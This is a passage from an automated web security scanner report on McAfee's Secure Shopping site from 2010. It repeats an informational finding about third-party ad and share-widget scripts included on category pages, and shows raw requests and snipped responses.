Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=192341800.102881162.1293269981.1293269981.1293269981.1; __utmc=192341800; __utmb=192341800.11.10.1293269981; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:48:11 GMT
Content-Type: text/html; charset=utf-8
Date: Sat, 25 Dec 2010 03:48:11 GMT
Content-Length: 61550

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Terminals & Thin Clients at McAfee Secure Shopping - Search,
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.152. http://secureshopping.mcafee.com/browse/electronics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/electronics/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/electronics/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:48:00 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:48:00 GMT
Content-Length: 61894

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Electronics at McAfee Secure Shopping - Search, Discover & C
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.153. http://secureshopping.mcafee.com/browse/electronics/digital-cameras/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/electronics/digital-cameras/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/electronics/digital-cameras/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:48:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:48:28 GMT
Content-Length: 56538

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Digital Cameras at McAfee Secure Shopping - Search, Discover &am
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.154. http://secureshopping.mcafee.com/browse/food-wine/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/food-wine/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/food-wine/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:49 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:49 GMT
Content-Length: 59727

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Food & Wine at McAfee Secure Shopping - Search, Discover &am
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.155. http://secureshopping.mcafee.com/browse/health-beauty/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/health-beauty/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/health-beauty/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:10 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:10 GMT
Content-Length: 56079

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Health & Beauty at McAfee Secure Shopping - Search, Discover
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.156. http://secureshopping.mcafee.com/browse/home-garden/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/home-garden/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/home-garden/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:10 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:10 GMT
Content-Length: 89522

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Home & Garden at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.157. http://secureshopping.mcafee.com/browse/jewelry-watches/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/jewelry-watches/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/jewelry-watches/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:49 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:49 GMT
Content-Length: 65713

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Jewelry & Watches at McAfee Secure Shopping - Search, Discov
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.158. http://secureshopping.mcafee.com/browse/magazines/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/magazines/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/magazines/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:49 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:49 GMT
Content-Length: 61806

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Magazines at McAfee Secure Shopping - Search, Discover & Com
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.159. http://secureshopping.mcafee.com/browse/movies/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/movies/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/movies/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:52 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:52 GMT
Content-Length: 58344

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Movies at McAfee Secure Shopping - Search, Discover & Compar
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.160. http://secureshopping.mcafee.com/browse/music/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/music/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/music/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:53 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:53 GMT
Content-Length: 60830

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Music at McAfee Secure Shopping - Search, Discover & Compare
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
